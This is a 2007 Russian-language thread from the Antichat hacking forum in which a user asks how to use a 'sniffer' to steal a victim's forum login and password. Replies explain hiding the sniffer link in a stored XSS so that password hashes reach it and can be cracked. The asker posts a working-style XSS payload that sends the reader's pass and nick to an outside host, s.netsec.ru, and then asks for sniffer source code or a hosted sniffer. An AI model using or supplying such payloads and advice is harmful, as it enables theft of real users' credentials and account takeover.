Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Принцип работы сниффера (https://forum.antichat.xyz/showthread.php?t=31468)

Pashahak 17.01.2007 10:58

Принцип работы сниффера
 
Пацаны, ну во-первых всем привет, а во-вторых... мож кто не полениться и объяснит мне принцип работы сниффера в сети и как им правильно пользоваться. И еще, а это правда, что есть такие снифферы, что если я помещу ссылку на него в форуме, а жертва по ней зайдет, то я могу получить ее пасс и логин ( мне говорили что это только на FastBB ато там пароли храняться в открытом виде )??? Мож кто научит, просветит?!

Azazel 17.01.2007 12:06

Привет, пацан
Принцип работы: http://ru.wikipedia.org/wiki/Sniffer
Как правильно пользоваться: анализировать сетевой траффик.
Правду ли тебе сказали: Да, правду.
Читай тут http://old.antichat.ru/sniff/

cardons 17.01.2007 12:18

Цитата:

Сообщение от Pashahak
Пацаны, ну во-первых всем привет, а во-вторых... мож кто не полениться и объяснит мне принцип работы сниффера в сети и как им правильно пользоваться. И еще, а это правда, что есть такие снифферы, что если я помещу ссылку на него в форуме, а жертва по ней зайдет, то я могу получить ее пасс и логин ( мне говорили что это только на FastBB ато там пароли храняться в открытом виде )??? Мож кто научит, просветит?!

Ну во первых ты выкладываешь не открытую ссылку на снифер а скрытую её в xss. Если XSS активная то любому пользователю достаточно просто прочитать сообщение чтобы хэш пришол на снифер. На снифер приходят все паоли от любых форумов самое главное составить правильно XSS большинство на снифер приходят пароли в зашифрованом виде типа md5 который потом можно расшифровать получив пароль из него.

Pashahak 17.01.2007 14:12

Я не умею пользоваться XSS, я вообще не знаю Java Script, мне нужно что б жертва просто прошла по ссылке, я ее туда просто заманю. Я хотел истользовать активную XSS, но у меня не вышло почему-то. Она видна другим пользователям. Я вот такое отправил:

[font color=[img src=http://s.netsec.ru/s.gif/style=display:none;background:url(javascript:docum ent.images[1].src="http://s.netsec.ru//s.gif?id=79 &"+pass+nick); ]][/font]

но видимо не судьба етому свершиться, да еще и сниффер на s.netsec.ru почему-то у меня не открываеться, все время мне 404 выбивает. Так что мож кто исходники даст на такой сниффер или даст ссылку где можна такую фишку зарегить?

cardons 17.01.2007 17:08

1) форум скажи какой
2) возможна эта хсс не под эту версию форума

Azazel 17.01.2007 17:36

Не судьба, значит. Ты этого просто не очень сильно хочешь.

Pashahak 17.01.2007 22:11

Я просто не очень сильно знаю. Форум FastBB ( На Borda.ru )

Pashahak 17.01.2007 22:13

А еще одно: может кто-то обьяснить чайнику как пользоваться ScoopLm

Retscan 18.01.2007 16:33

Цитата:

Форум FastBB ( На Borda.ru )
бронированный форум. Даже не думай :)

Pashahak 19.01.2007 11:05

Вот тебе на, бронированный форум. Ну неужели ничего не можна сделать. Так давайте все по порядку. Пароли на FastBB храняться в открытом виде, это все знают, мне не нужна активная XSS мне и пассивной было бы вполне достаточно. Пожалуйста, мужики, подскажите где можна захомутать сниффера??? Век буду признателен!


Время: 10:50